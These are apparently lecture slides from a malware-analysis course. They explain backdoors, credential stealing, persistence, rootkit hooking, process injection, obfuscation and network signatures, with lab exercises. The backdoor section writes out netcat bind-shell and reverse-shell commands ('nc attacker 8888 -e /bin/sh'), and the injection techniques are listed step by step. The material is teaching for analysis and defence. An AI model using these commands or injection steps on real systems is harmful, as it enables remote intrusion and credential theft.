Download - Part 4: Malware Functionality
Part 4: Malware Functionality
Chapter 11: Malware BehaviorChapter 12: Covert Malware Launching
Chapter 13: Data EncodingChapter 14: Malware-focused Network
Signatures
Chapter 11: Malware Behavior
Common functionality
1. Downloaders
2. Backdoors
3. Credential stealers
4. Persistence mechanisms
5. Privilege escalation
6. Covering tracks (rootkits)
1. Downloaders
Retrieve additional pieces of malware from network to executeOften packaged with an exploitIn Windows, API call URLDownloadtoFileA used to
downloadFollowed by call WinExec to execute
2. Backdoor
Malware that provides attacker with remote access to victim machineMost common type of malwareCommonly use outgoing port 80 (HTTP) to blend in
with other trafficCommonly implement reverse shells
• Allow attacker to execute commands as if they were on local system
• Examples: netcat, cmd.exe, remote administration tools
netcat
On computer 1, execute program “echo hello” and redirect output to local netcat server on 8888
Connect to computer 1 at 8888 and redirect output to file foo.txt
victim$ echo hello | nc –l –p 8888victim$ echo hello | nc –l –p 8888
attacker$ nc victim 8888 >foo.txtattacker$ nc victim 8888 >foo.txt
attacker$ cat foo.txtattacker$ cat foo.txt
hellohello
netcat
Backdoor shell listener
Connecting to shell
victim$ nc –l –p 8888 –e /bin/shvictim$ nc –l –p 8888 –e /bin/sh
attacker$ nc comp1 8888attacker$ nc comp1 8888
ConnectionConnection
AttemptAttempt
AttackerAttacker
FirewallOr NAT
X
nc –l –p 8888 –e /bin/shnc –l –p 8888 –e /bin/shnc victim 8888nc victim 8888
VictimVictim
Getting past firewalls and NAT
attacker$ nc -l -p 8888attacker$ nc -l -p 8888
victim$ nc attacker 8888 -e /bin/shvictim$ nc attacker 8888 -e /bin/sh
Connection shovelConnection shovel
AttackerAttacker
Firewall
nc attacker 8888 –e /bin/shnc attacker 8888 –e /bin/shnc –l –p 8888nc –l –p 8888
VictimVictim
netcatBypass firewalls and NAT by “shoveling a shell”
Make attacker run listener
Victim initiates outgoing connection (e.g. IRC, HTTP)
Windows reverse shells
cmd.exe equivalent to netcatCreateProcessCreate a socket and connect it to serverTie stdin, stdout, and stderr of process to socketMultithreaded version can use CreateThread and
CreatePipe
Remote administration tools
Similar to botnet command and controlVictim beacons outside controller to receive
instructionsExample: Poison Ivy
3. Credential Stealers
3 main typesPrograms that monitor user loginsPrograms that dump credentials stored in Windows
(e.g. password hashes) that can be attacked off-linePrograms that log keystrokes
Monitoring User Login
Graphical Identification aNd Authentication (GINA) for Windows Login Winlogon process started Winlogon invokes GINA library code (msgina.dll) GINA requests credentials
Example: GINA interception
FakeGINA sits between Winlogon and msgina.dll (Figure 11-2)Exploits mechanism intended to allow other means
of authenticationConfigured to run by setting a Windows registry key
• HKLM\SOFTWARE\...\Winlogon\GinaDLL set to fsgina.dll
Winlogon processwinlogon executesfakegina.dll requests credentialsfakegina.dll passes credentials to msgina.dllLogout hooked to store credentials (Listing 11-1)
Dumping credentials
Password storageTypically, only hashes of passwords storedUsers with forgotten passwords issued new onesHash function well-knownDumping hashes allows dictionary attacks since
users with weak passowrds subject to brute-force dictionary attacks off-line
Windows hashesSecurity Account Manager (SAM)Local Security Authority Subsystem Service
(LSASS)
Example: lsass dumping
Pwdump, Pass-the-Hash (PSH) toolkitsPwdump performs DLL injection on lsass.exe (Local
Security Authority Subsystem Service)Injects lsaext.dllUses GetHash call to extract hashes
• Can be easily changed to avoid signatures
• Listing 11-2 “GrabHash” variant
Logging keystrokes
Records keystrokes so attacker can observe typed data
Kernel-based keyloggersBuilt into keyboard drivers
User-space keyloggersUse Windows API to hook I/O functions
(SetWindowsHookEx) or poll for state of keys (GetForegroundWindow and GetAsyncKeyState)
Example polling keylogger: Listing 11-4
4. Persistence Mechanisms
Methods to ensure survival of malware on a systemWindows Registry persistenceTrojaningDLL load-order hijacking
Windows registry persistence
Common key malware targets HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+ dozens moreAppInit_DLLs
• Loaded into every process that loads User32.dll
• Stored in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
• Space delimited string of DLLs
Windows registry persistence
Common key malware targetsWinlogon
• Hooking logged events (logon, logoff, startup, shutdown, lock screen)
• \HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
• When winlogon.exe generates an event, Windows checks the Notify registry key above for a DLL that will handle it
SvcHost DLLs• All services persist via registry
• svchost.exe – generic host process for services that run from DLLs
• \HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
• \HKLM\System\CurrentControlSet\Services\ServiceName
Trojaning
Malware patches binary or library to add its functionalityExample: Nimda, BlissAppend code in existing section or in new sectionChange entry point to point to virus codeVirus returns to target program after execution
typedef struct { unsigned char e_ident[EI_NIDENT]; Elf32_Half e_type; Elf32_Half e_machine; Elf32_Word e_version; Elf32_Addr e_entry; Elf32_Off e_phoff; Elf32_Off e_shoff; Elf32_Word e_flags; Elf32_Half e_ehsize; Elf32_Half e_phentsize; Elf32_Half e_phnum; Elf32_Half e_shentsize; Elf32_Half e_shnum; Elf32_Half e_shstrndx; } Elf32_Ehdr;
interesting!
Trojaning using the ELF header
“This member gives the virtual address to which the system first transfers control, thus starting the process”
We can change this to point elsewhere (not main() )
Trojaning DLLs
DllEntryPoint function tamperingTable 11-1pusha to save all registers in one instructionLook for popa to see return back to legitimate codeListing 11-5
Trojaning DLLs
DLL load-order hijackingDLL search path in Windows
• Directory from which application was loaded
• Current directory
• System directory (GetSystemDirectory function)
• 16-bit system directory
• Windows directory (GetWindowsDirectory function)
• Directories in PATH environment variable
Rename malicious library and place high in path
5. Privilege escalation
Most users run as local administrators
Malware uses privilege escalation for those that don'tExploit vulnerable code to obtain administrator
privilegesMany malware frameworks include such exploits
(e.g. http://www.metasploit.com/)Access to restricted calls such as
TerminateProcess and CreateRemoteThread
Using SeDebugPrivilege
Modify security token of a process using AdjustTokenPrivileges to obtain
Initially used as a tool for system-level debuggingAdd SeDebugPrivilege to process (Listing 11-6)
6. Covering tracks – rootkits
Hide malicious activityMake malicious files, processes, network
connections, and other resources invisibleMost rootkits are kernel-mode to run at the same
level as anti-virus/anti-malware
Function hooking
Mechanism used to redirect function calls to injected attack codeReplaces legitimate function with alternative one
Two general methodsFunction table hooking
Run-time data structures that contain function pointers that are invoked during program execution
Hot patching function invocation (inline hooking)Modify JMP/CALL targetsModify function prologues to add detour to trampoline
IAT hooking
Import Address Table (IAT) used to call functions in libraries
Application code
push <call parms>call [imp_InternetConnect]…
Import Address Table
jmp InternetConnectjmp InternetAutodialjmp InternetErrorDlg…
InternetConnect()
push ebplea ebp, [esp+var_5 8]sub esp, 29Ch……
IAT hookingModify IAT to hijack a DLL call
Makes a hack ‘portable’ to other applications Load rootkit hook function into memory Replace target function’s address in the IAT with address of hook function Figure 11-4
Application code
push <call parms>call [imp_InternetConnect]…
Import Address Table
jmp InternetConnectjmp InternetAutodialjmp InternetErrorDlg…
xRootkit Code
InternetConnect()
push ebplea ebp, [esp+var_5 8]sub esp, 29Ch……
IAT hooking
Method Locate import section from IAT Find IMAGE_IMPORT_DESCRIPTOR chunk of DLL that exports that
function Locate IMAGE_THUNK_DATA which holds original address of imported
function Replace address in IAT to point to your function and have your function
eventually call the original
Detection problems Legitimate hooking common
Methods such as DLL forwarding makes benign vs. malicious hooks hard to discern
Late bindingApplications do late-demand binding where function addresses are not
resolved until calledReduces amount of memory usedBut, won’t know what the legitimate values should be!
Example library hooks
Processes rely on APIs provided by aboveDLLs loaded at runtime into process address space
Kernel32.dll, User32.dll, Gui32.dll, Advapi.dllKernel32 loaded into private address space between 0x00010000
and 0x7FFE0000
Example: Hiding files in a directoryReplace FindFirstFile(), FindNextFile() in Kernel32 to skip rootkit files
Other DLLsDirectX/OpenGL APIs and time functions
Typically hooked to implement cheating in on-line games
Winsock APIHooked to monitor network traffic
Example library hook
Hook keyboard/DirectInput APIs to obtain keyboard/mouse eventsGetKeyboardState(), GetKeyState(),
GetDeviceState(), etc.
SHORT WINAPI FakeGetAsyncKeyState(int vKey){
SHORT nResult = 0;if (g_bNeedMP) {
if (vKey == VK_M) {nResult |= 0x8000; //’M’ pressedg_bNeedMP = FALSE;
}}else
nResult = RealGetAsyncKeyState(vKey);//...return nResult;
}
DetoursLibrary developed by Microsoft in 1999
Instrument and extend existing OS and application functionality simply• G. Hunt, D. Brubacker, “Detours: Binary Interception of
Win32 Functions”, 3rd USENIX Windows NT Symposium, July 1999.
• A programmer-friendly “feature” of Windows to easily patch functions
Call hooks modify tables and can be detected by anti-virus/anti-rootkit technology
• Detours modify function in-line
Malware uses to extend application with malicious functions• Commonly used to add malicious DLLs into existing
binaries on disk
• Adds a new .detour section into PE structure and modifies import address table using setdll tool in Detours library
• Targets include authentication check, DRM checks, anti-virus code, file system scans
Detour mechanism
Detour and Trampoline
Redirect function calls inlineSave initial instructions of function at the entry point
• Original bytes of function saved in trampoline
Inject code (detour) to redirect execution to interceptor function (trampoline)
• Insert jump instruction into function directly
Trampoline• Implements 5 replaced bytes of original
function
• Implements the function you want to execute
• jmps back to original target function plus 5
Detour detailsReplace function preamble with a 5-byte unconditional jmp
Implement replaced instructions in trampoline code Before XP
55 push ebp8bec mov ebp, espHard to hook since you must disassemble user code
After XP8bff mov edi, edi55 push ebp8bec mov ebp, espEasy to hook, exactly 5 bytesMSFT intentionally did this to make hot patches easy
More powerful than IAT hooking Do not have problems with binding time No matter how the function is called, your code will run Functions appearing in multiple tables are handled in one step Can be used for both kernel and user functions
Detours
Overwriting important codeMust know which OS is being used Must also ensure no one else has tampered or patched
the function alreadyMust save the instructions being removed by detourPatching addresses
Relative FAR JMP instruction target calculated at run-timeNeed to patch this with desired offset at run-time
FAR JMP Rest of original function
Rootkit code Removed instructions FAR JMP
Detour example
Modify ZwDeviceIoControlFile to hide portsListing 11-7: Get pointer to code location of function
to insert hook into eaxTable 11-2: Define “hook byte” template (detour)Copy address of hooking function into template
(memcpy)Listing 11-8: Call to install hook bytes into
ZwDeviceIoControlFile callHook bytes can be installed deep into function to
avoid detection
Rootkit functionsDisable or modify anti-virus process
Disable software updates
Disable periodic “rehooking” code
Modify network operations and services
Modify boot loaderHave boot loader apply patches to kernel before loading
Modify on-disk kernelModify boot loader to allow new kernel to pass integrity
check
Registering as a driver or boot serviceLoad on boot via run key in registryMust hide key from anti-virus after being loaded
In-class exerciseLab 11-1
– Use strings to identify potential target of malware
– Generate Figure 11-1L (Show TGAD section)
– Show Resource Hacker extracting TGAD
– In IDA Pro, show the routine that performs the extraction
– Generate Listing 11-2L in the extracted DLL
– Show Listing 11-3L and explain why a jmp is used
– Show Listing 11-4L and explain why a call is used
– Show Listing 11-5L and explain the purpose of msutil32.sys
Chapter 12: Covert Malware Launching
Covert Launching MethodsLaunchers
Process Injection
Process Replacement
Hook Injection
Detours
APC Injection
1. LaunchersMalware that sets itself up for immediate or future covert
executionOften contain malware that is to be executed in a resource
sectionSee previous Lab 11-01Uses FindResource, LoadResource, and SizeofResource
API calls to extract
2. Process InjectionInject code into another running process
Bypasses host-based firewalls and process-specific security mechanisms
Force process to call VirtualAllocEx, then WriteProcessMemory to inject code
Two injection types: DLL injection, direct injection
DLL injectionForce remote process to load a malicious DLL
Most common covert loading techniqueRemotely inject code into process that calls LoadLibraryOS automatically executes DllMain of newly loaded librariesAll actions appear to originate from compromised processFigure 12-1
DLL injection into running process
DLL injectionMethod #1
CreateToolhelp32Snapshot, Process32First, Process32Next API calls to search the process list for victim process
Get PID of victim and use OpenProcess to obtain handle Allocate space for name of malicious DLL in victim process
• VirtualAllocEx allocates space in remote process if handle provided
Call WriteProcessMemory to write string into victim process where VirtualAllocEx obtained space
Call CreateRemoteThread to start a new thread in victim• lpStartAddress : starting address of thread (set to address
of LoadLibrary)
• lpParameter : argument for thread (point to above memory that stores name of malicious DLL
• Listing 12-1, Figure 12-2
J. Richter, “Load Your 32-bit DLL into Another Process’s Address Space Using INJLIB”, Microsoft Systems Journal/9 No. 5
DLL injectionMethod #2
Allocate space in the victim process for code to inject DLL Write DLL injection code into the memory space of the victim Create or hijack a thread in the victim to run/load the DLL Clean up tracks
Preserving original functionality Still need original functions to work correctly Injected DLL often set up to call original DLL to support desired functionality Interposed between application and real DLL
Example tool Inject.exe (Aphex) C:\> inject.exe winlogon “myrootkit.dll”
DLL injectionMethod #2 using Windows Debug API
Attacker must have Debug programs rights on system
Get debugger attached to process and run Break when you want to inject Obtain code to inject/load a DLL into memory space Analyze PE header to find a usable, writable part of memory for code
• ReadProcessMemory to save what is there
• WriteProcessMemory to write injection code
• Include INT 3 at end of injection code for debugger to stop
• Set EIP to start of code to inject a DLL and continue
• Breaks when DLL loaded, restore original state of memory (i.e. remove code to inject DLL)
Even easier with a code cave (no need to save memory) to process and run
Code cave example
Communications Technology Lab
Code cave
Direct injectionSimilar to DLL injection, but write all code into victim process
directlyNo DLLRequires custom code that will not disrupt victim processOften used to inject shellcode
MechanismUse VirtualAllocEx, WriteProcessMemory to write data used
for subsequent call to CreateRemoteThreadUse VirtualAllocEx and WriteProcessMemory again to
allocate space for remote thread codeUse CreateRemoteThread to execute
3. Process replacementOverwrite memory space of running process with malicious executable
Disguise malware without risking crashes from partial injection Example: svchost.exe
• Start svchost in suspended state
• Pass CREATE_SUSPENDED as the dwCreationFlags parameter when calling CreateProcess (Listing 12-2, 12-3)
• Release all memory using ZwUnmapViewOfSection
• Allocate memory for malicious code via VirtualAllocEx
• WriteProcessMemory to write malware sections
• SetThreadContext to fix entry point to point to malicious code
• ResumeThread to initiate malware
• Bypasses firewalls and intrusion prevention systems since svchost runs many network daemons
4. Hook InjectionInterpose malware using Windows hooks
Hooks used to handle messages and events going to/from applications and operating system
Use malicious hooks to run certain code whenever a particular message is intercepted (i.e. keystrokes)
Use malicious hooks to ensure a particular DLL is loaded in a victim's memory space (i.e. process loaded event)
Types of hooksLocal hooks: observe and manipulate messages internally
within processRemote hooks: observe and manipulate messages destined
for a remote process
Example hooksKeyboard hooks
Registering hook code using WH_KEYBOARD or WH_KEYBOARD_LL hook procedure types to implement keyloggers
Windows hooksRegister hook with SetWindowsHookEx to capture window
events
Targeting threads Hooks must determine which thread to attach toMalware must include code to get dwThreadId of victimSearch process listing to find Intrusion Prevention Systems look for suspicious hooksListing 12-4
5. DetoursSee previous chapter
Figure 12-4
Detours
Example: MigBotDetours two kernel functions: NtDeviceIoControlFile
and SeAccessCheckBoth are exported and have entries in the PE
header
APC injectionAPC = Asynchronous Procedure Call
CreateRemoteThread requires overheadMore efficient to invoke function on an existing threadEach thread has an APC function queue attached to itThreads execute all functions in APC queue when in an
alertable state (i.e. swapped out)• e.g. after calls to WaitForSingleObjectEx,
WaitForMultipleObjectsEx, and SleepEx
Malware performs APC injection to preempt threads in an alertable state to get immediate execution of their code
Two formsKernel-mode: APC generated for the system or a driverUser-mode: APC generated for an application
APC injection from user spaceOne thread can queue a function to be invoked in another
via API call QueueUserAPCWaitForSingleObjectEx is the most common call to the
Windows APIListing 12-5: OpenThread followed by QueueUserAPC using
LoadLibraryA on a malicious DLL (dbnet.dll)• Note: calls to CreateToolhelp32Snapshot or
ZwQuerySystemInformation, Process32First, Process32Next, Thread32First, and Thread32Next usually precede this snippet
APC injection from kernel spaceMalicious drivers in kernel often would like to execute code in
user spaceListing 12-6: kernel code to inject an APC into user space
In-class exerciseLab 12-1
Show the imports and strings
Rename the three imports (see Listing 12-1L)
Generate Listing 12-2L and explain what its function is
Explain how Listing 12-4L uses what is performed in Listing 12-3L
Use ProcessExplorer to show injection for Figure 12-1L
Generate Listing 12-5L and explain the parameters
In-class exerciseLab 12-3
Show the imports that indicate the program's function
Generate Listing 12-14L and explain what “fn” is
Navigate fn to generate Listing 12-15L
Follow the function called after a “KEYDOWN” event. What does the code in Listing 12-16L do?
Chapter 13: Data Encoding
Data EncodingGoal
Defeat signature-detection by obfuscating malicious content• Encrypt network communication• Hide command and control location• Hide staging file before transmission• Hide from “strings” analysis
MethodsSimple CiphersCommon Cryptographic AlgorithmsCustom EncodingDecoding
Simple CiphersCaesar Cipher
Shift/Rotate characters
XORBit-wise XOR of data with a fixed byte or generated byte
streamFigure 13-1For a fixed byte XOR, can brute force all 256 values to find a
header that makes sense (Table 13-1, Listing 13-2)Some malware uses null-preserving XOR to make detection
less obviousDecoding loops easy to identify via searching for xor opcode
• Figure 13-2
Simple CiphersBase-64
Represents binary data in an ASCII string formatFrom MIME standard, Binary data converted into one of 64 primary characters
• [a-zA-Z0-9+/], = used for padding• Every 3-bytes of binary data is encoded in 4-
bytes of Base64 (Figure 13-4) 0 1 2 3 4 5 6 7 8 9 0 A B C D E F G H I J 10 K L M N O P Q R S T 20 U V W X Y Z a b c d 30 e f g h i j k l m n 40 o p q r s t u v w x 50 y z 0 1 2 3 4 5 6 7 60 8 9 + /
Example:• 3 byte binary =01001101 01100001 01101110• 4 byte Base64 = 010011 010110 000101
101110– TWFu
Simple CiphersBase-64 decoding
Look for a string used as an index table• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg
hijklmnopqrstuvwxyz0123456789+/
Try on-line conversion tools• www.opinionatedgeek.com/dotnet/tools/
base64decode
Caution: Malware can easily modify index table to create custom substitution ciphers very easily (see book example)
Common Cryptographic AlgorithmsUse cryptographic ciphers to obfuscate strings
DrawbacksCrypto libraries are large and easily detectedMust hide the key for symmetric encryption algorithms
Recognizing encrypted code Imports include well-known OpenSSL or Microsoft functions
(Figure 13-9)Use of cryptographic constants (Figure 13-10)
• FindCrypt2 plugin in IDA Pro• Krypto ANALyzer plugin for PEiD
Some malware employs crypto algorithms that do not have constants (RC4, IDEA generate at run-time)
• Must search for high-entropy content (Figure 13-13)
Common Cryptographic AlgorithmsUse cryptographic ciphers to obfuscate strings
DrawbacksCrypto libraries are large and easily detectedMust hide the key for symmetric encryption algorithms
Recognizing encrypted code Imports include well-known OpenSSL or Microsoft functions
(Figure 13-9)Use of cryptographic constants (Figure 13-10)
• FindCrypt2 plugin in IDA Pro• Krypto ANALyzer plugin for PEiD
Some malware employs crypto algorithms that do not have constants (RC4, IDEA generate at run-time)
• Must search for high-entropy content (Figure 13-13)
Custom EncodingHints
Trace execution to see suspicious activity in a tight loopExample: pseudo-random number generation followed by xor
(Figure 13-14, 13-15)
DecodingSelf-decoding malware
Malware packaged with decoding routineTell-tale sign: strings that don't appear in binary file on disk,
but appear in debugger Decrypt by setting a breakpoint directly after decryption
routine finishes execution
Malware employing decoding functionsMalware relies on system libraries to decode (i.e. Python's
base64.decodestring() or PyCrypto's functions)Listing 13-10OpenSSL calls
In-class exerciseLab 13-1
Show strings output Show web request listed in Listing 13-1L in Wireshark (turn off
promiscuous mode) In IDA Pro, search for all xor, then bring up Figure 13-1L, rename
xorEncode Bring up xrefs to xorEncode to get to Listing 13-2L Bring up binary in PEView to find resource section with type and name
listed in Listing 13-2L Install WinHex (winhex.com), open binary, and perform Figure 13-2L Install PEiD (softpedia.com) with caution (should be a Zip file), open
binary, and run KANAL at bottom right arrow to obtain Listing 13-3L Bring up Figure 13-3L in IDA Pro From xref to top-level function, bring up and rename base64index
function From xref to base64index, bring up Listing 13-4L What does the string in the URL being requested represent?
Chapter 14: Malware-Focused Network Signatures
Networking and MalwareNetwork Countermeasures
Safely Investigating an Attacker Online
Content-Based Network Countermeasures
Combining Dynamic and Static Analysis Techniques
Understanding the Attacker's Perspective
Network CountermeasuresIP connectivity
Restrict network access using routers and firewalls
DNSReroute known malicious domains to an internal host
(sinkhole)
Content-filtersProxies, intrusion detection systems, an intrusion prevention
systems for intercepting web requests in order to detect or prevent access
Network CountermeasuresMine logs, alerts, and packet captures from forensic
informationNo risk of infection when performing post-mortem analysis
versus actively attempting to run malwareMalware can be programmed to detect active analysis
Indications of malicious activityBeacons to malicious sites, especially if done without DNS
query
OPSEC: Operations SecurityTake preventative measures to guard against
• Malware authors detecting you are on to them by embedding one-time use name
• Malware authors capturing information about you such as your home IP address or contacts
Safely Investigate an Attacker OnlineIndirection
Use network anonymizers such as Tor to hide yourselfUse a virtual machine and virtual networks running through
remote infrastructure (cellular, Amazon EC2, etc)
IP address and DNS informationSee Regional Internet Registries to find out organizational
assignment of IP blocksQuery whois records of DNS names to find contact
information metadata (domaintools.com)
Content-Based Network Countermeasures
Intrusion Detection with SnortRules that link together elements that must be true to fireSize of payload, flag fields, specific settings of TCP/IP
headers, HTTP headers, content in payloadTable 14-1: Wefa7e's HTTP User-Agentp. 303 Snort rule to detect Wefa7eVariants of malware may tweak User-Agent
• Use regexps to modify rule
Combining Dynamic and Static Analysis Techniques
Steganography in protocolsAttackers mimicking typical web requestsEncoding commands in URLs and HTTP headersEncoding commands in meta-data of web pages
Finding networking code to develop signaturesWinSock API (WSAStartup, getaddrinfo, socket, connect,
send, recv, WSAGetLastError)WinINet API (InternetOpen, InternetConnect,
InternetOpenURL, InternetReadFile, InternetWriteFile, HTTPOpenRequest, HTTPQueryInfo, HTTPSendRequest
COM interface (URLDownloadToFile, CoInitialize, CoCreateInstance, Navigate)
Finding hard-coded patterns or stable content to create rulesReverse-engineering encoding or decoding scheme allows
for accurate network signature generation
Understanding the Attacker's Perspective
Attackers will slightly change payloads to avoid detection
StrategiesFocus on elements that are part of both endpointsFocus on elements of protocol known to be part of a key
(see above)Operate at a level that is different than other defenders (so
that an attacker side-stepping another filter will not affect yours)
In-class exerciseLab 14-1
Run malware and capture the HTTP request it produces shown in Listing 14-1L. Is it different?
Find the networking API call this malware uses for its request in IDA Pro
Find where the URL string template is storedGenerate Figure 14-1LGenerate Figure 14-2L by redefining data location where
string is storedLocate where the two parts of the URL string are generated
(in the %s-%s sprintf)Map out how the character “6” is generated in the encoded
URLHow could malware break the first Snort rule shown?